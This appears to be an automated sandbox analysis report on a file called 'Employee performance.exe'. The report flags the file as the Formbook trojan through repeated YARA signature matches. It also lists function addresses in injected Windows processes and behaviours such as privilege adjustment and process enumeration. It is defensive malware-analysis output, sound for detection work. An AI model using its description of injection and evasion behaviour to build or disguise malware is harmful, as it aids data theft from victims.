Source: C:\Windows\explorer.exe	Code function: 3_2_118B0082	3_2_118B0082
Source: C:\Windows\explorer.exe	Code function: 3_2_118B9036	3_2_118B9036
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0090305C	10_2_0090305C
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0090764B	10_2_0090764B
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0090978B	10_2_0090978B
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052C0535	10_2_052C0535
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05380591	10_2_05380591
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05364420	10_2_05364420
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05372446	10_2_05372446
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0536E4F6	10_2_0536E4F6
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052C0770	10_2_052C0770
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052E4750	10_2_052E4750
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052BC7C0	10_2_052BC7C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052DC6E0	10_2_052DC6E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052B0100	10_2_052B0100
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0535A118	10_2_0535A118
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05348158	10_2_05348158
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_053801AA	10_2_053801AA
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_053741A2	10_2_053741A2
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_053781CC	10_2_053781CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05352000	10_2_05352000
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537A352	10_2_0537A352
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052CE3F0	10_2_052CE3F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_053803E6	10_2_053803E6
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05360274	10_2_05360274
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_053402C0	10_2_053402C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0535CD1F	10_2_0535CD1F
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052CAD00	10_2_052CAD00
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052D8DBF	10_2_052D8DBF
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052BADE0	10_2_052BADE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052C0C00	10_2_052C0C00
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05360CB5	10_2_05360CB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052B0CF2	10_2_052B0CF2
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05362F30	10_2_05362F30
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05302F28	10_2_05302F28
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052E0F30	10_2_052E0F30
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05334F40	10_2_05334F40
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0533EFA0	10_2_0533EFA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052CCFE0	10_2_052CCFE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052B2FC8	10_2_052B2FC8
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537EE26	10_2_0537EE26
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052C0E59	10_2_052C0E59
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537CE93	10_2_0537CE93
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052D2E90	10_2_052D2E90
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537EEDB	10_2_0537EEDB
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052D6962	10_2_052D6962
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052C29A0	10_2_052C29A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0538A9A6	10_2_0538A9A6
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052CA840	10_2_052CA840
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052C2840	10_2_052C2840
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052A68B8	10_2_052A68B8
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052EE8F0	10_2_052EE8F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537AB40	10_2_0537AB40
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05376BD7	10_2_05376BD7
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052BEA80	10_2_052BEA80
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05377571	10_2_05377571
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0535D5B0	10_2_0535D5B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_053895C3	10_2_053895C3
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537F43F	10_2_0537F43F
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052B1460	10_2_052B1460
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537F7B0	10_2_0537F7B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05305630	10_2_05305630
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_053716CC	10_2_053716CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F516C	10_2_052F516C
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0538B16B	10_2_0538B16B
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052AF172	10_2_052AF172
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052CB1B0	10_2_052CB1B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537F0E0	10_2_0537F0E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_053770E9	10_2_053770E9
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052C70C0	10_2_052C70C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0536F0CC	10_2_0536F0CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537132D	10_2_0537132D
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052AD34C	10_2_052AD34C
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0530739A	10_2_0530739A
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052C52A0	10_2_052C52A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_053612ED	10_2_053612ED
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052DB2C0	10_2_052DB2C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05377D73	10_2_05377D73
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052C3D40	10_2_052C3D40
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05371D5A	10_2_05371D5A
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052DFDC0	10_2_052DFDC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05339C32	10_2_05339C32
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537FCF2	10_2_0537FCF2
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537FF09	10_2_0537FF09
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537FFB1	10_2_0537FFB1
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052C1F92	10_2_052C1F92
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05283FD2	10_2_05283FD2
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05283FD5	10_2_05283FD5
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052C9EB0	10_2_052C9EB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05355910	10_2_05355910
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052C9950	10_2_052C9950
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052DB950	10_2_052DB950
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0532D800	10_2_0532D800
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052C38E0	10_2_052C38E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537FB76	10_2_0537FB76
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052DFB80	10_2_052DFB80
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05335BF0	10_2_05335BF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052FDBF9	10_2_052FDBF9
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05333A6C	10_2_05333A6C
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05377A46	10_2_05377A46
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0537FA49	10_2_0537FA49
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05305AA0	10_2_05305AA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05361AA3	10_2_05361AA3
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0535DAAC	10_2_0535DAAC
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0536DAC6	10_2_0536DAC6
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032E2FB0	10_2_032E2FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032E9E4B	10_2_032E9E4B
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032E9E50	10_2_032E9E50
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032FEE97	10_2_032FEE97
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032E2D87	10_2_032E2D87
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032E2D90	10_2_032E2D90
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0501A036	10_2_0501A036
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05012D02	10_2_05012D02
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0501E5CD	10_2_0501E5CD
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05018912	10_2_05018912
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05011082	10_2_05011082
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05015B30	10_2_05015B30
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05015B32	10_2_05015B32
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0501B232	10_2_0501B232

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 035AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03587E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0352B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03575130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 035BF290 appears 105 times
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: String function: 00FF0A30 appears 46 times
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: String function: 00FD9CB3 appears 31 times
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: String function: 00FEF9F2 appears 40 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 0532EA12 appears 86 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 052AB970 appears 277 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 05307E54 appears 111 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 0533F290 appears 105 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 052F5130 appears 58 times

Source: Employee performance.exe, 00000000.00000003.1243087864.000000000415D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Employee performance.exe
Source: Employee performance.exe, 00000000.00000003.1248529993.0000000003FB3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Employee performance.exe

Source: Employee performance.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Employee performance.exe.15e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Employee performance.exe.15e0000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Employee performance.exe.15e0000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Employee performance.exe.15e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Employee performance.exe.15e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Employee performance.exe.15e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.3741729017.00000000118D2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Employee performance.exe PID: 4944, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 4132, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 4644, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@74/4@11/6

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_010437B5 GetLastError,FormatMessageW,

0_2_010437B5

Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_010310BF AdjustTokenPrivileges,CloseHandle,		0_2_010310BF
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_010316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_010316C3

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_010451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_010451CD

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_0105A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0105A67C

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_0104648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0104648E

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_00FD42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00FD42A2

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03

Source: C:\Users\user\Desktop\Employee performance.exe

File created: C:\Users\user~1\AppData\Local\Temp\autA92B.tmp

Jump to behavior

Source: Employee performance.exe

